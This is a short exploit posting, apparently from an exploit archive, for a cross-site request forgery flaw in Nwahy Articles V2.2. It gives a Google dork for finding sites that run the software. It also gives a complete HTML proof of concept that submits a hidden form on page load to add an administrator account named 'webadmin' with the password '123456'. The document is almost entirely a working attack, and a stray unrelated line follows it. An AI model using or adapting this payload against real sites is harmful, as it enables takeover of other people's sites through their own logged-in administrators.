########################################## [~] Exploit Title: Nwahy Articles V2.2 CSRF Add Admin [~] Author: DaOne [~] Date: 18-7-2012 [~] Category: webapps [~] Software Link: http://www.nwahy.com/upload/article-v2.2.rar [~] Google dork: intext:"Powered by Nwahy Articles V2.2" ########################################## [#] ~[ Exploit ]~ <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action="http://localhost/admincp/user.php?action=insert"> <input type="hidden" name="username" value="webadmin"/> <input type="hidden" name="password" value="123456"/> <input type="hidden" name="email" value="admin@admin.com"/> <input type="hidden" name="site" value="http://www.nwahy.com"/> <input type="hidden" name="name" value="..."/> <input type="hidden" name="groubtype" value="1"/> </form> </body> </html> ##########################################
体验盒子
